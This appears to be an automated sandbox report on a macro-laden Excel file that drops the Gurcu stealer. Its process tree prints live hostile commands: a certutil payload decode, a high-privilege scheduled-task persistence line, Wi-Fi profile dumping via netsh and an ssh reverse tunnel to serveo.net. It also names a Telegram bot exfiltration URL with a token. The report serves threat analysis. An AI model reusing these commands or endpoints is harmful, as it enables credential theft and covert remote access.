Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
27-10-2024 11:03
General
-
Target
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
-
Size
201KB
-
MD5
c595d96742a883a534ed1ca1f0d279d1
-
SHA1
c465daa9e5bd998ef39c59f80f82f79cc75ce659
-
SHA256
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de
-
SHA512
142506545388000aad69fbd9dabd62cb80b75fceb83cb8e31747a1c2de5495327fff2d4a6badabc691fb68df2361aa9f0a5adf969cf3f688b1f89959ca04538b
-
SSDEEP
6144:+pQEXBxlv/9mIRzcZcD50SQBpDb8FJA7xqSWbLsE4D:+XBrv/AIRA6D5nQB5b8FJA7xGfsVD
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7761583635:AAGKfAalgYsBotuxvw8mb6qVnPPY4_337uo/sendMessage?chat_id=972119615
Signatures
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Payload decoded via CertUtil.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of WriteProcessMemory 32 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7 C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe2⤵
- Process spawned unexpected child process
- Deobfuscate/Decode Files or Information
-
-
C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3276 serveo.net5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exeC:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exeC:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
135KB
MD5410bd9796a48df659618b405cdcedced
SHA1b87887753569673a6a3ea8ad568e0174c214f1ff
SHA2569c5701ef66f03629131a476381865069d0cf78bed20fab2725d04c2f9471af5f
SHA5121441142e9ade59fcea06afa43033ead028c68f0b5d420ded9fbd4b2c6fdcdd16bb002a58a87a4d637c7df70e1a5d680367be2bd8cc24e6e7346247d3587c9f5e
-
Filesize
180KB
MD5b2d32fe2797534b941688bc919d564fd
SHA17949b2d8e9e1d5c1e84618e10d61b615e0376676
SHA2565331e34ca1acf5576ce551607ecf5bf4430078e08a02bd940bab501bcb62135c
SHA51213b598897c35adfa09cf4664a20cf38bbde4968c2961691bff9e772c8ec6c5e97b241525fb39bffbeb02fa9bcde132897e3be3372c428d80529c89827bb70596
-
Filesize
4B
MD5b58ac8403eb9cf17fae1dcd16df71fde
SHA114e3891780777b97a3661b1a6fa05e709608e3c7
SHA2562c903ae837b047fdb5399bcc8883342ab398b868315d5c83e63d06f5c49efa1d
SHA512800d5168026f9d2bf7d1dff76b08a8f84f4e34a6d4799366eed44b596a304fafbe4b88b4a0429054ce96b79dfca733fbf01b2dc57e4aa7020248e761bbbe068e
-
Filesize
686B
MD5a9d99540c33aaccad328bef4c4f33472
SHA15cc1cdb50eba1eb4212e8299c2e34602a6c19b97
SHA25661f0b0371b67925b26578f68550c820c9051d85fb046f0cf8a3c2be1a001aa24
SHA512c4217d80bbb32f87ec8819aec50c94ca7577c72b84b37cacb2d1a4d1a1b43af47bbd9476c27930e9ee0260d3fc453779c4d78a70c3f63f575a8351a768702a06
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
160KB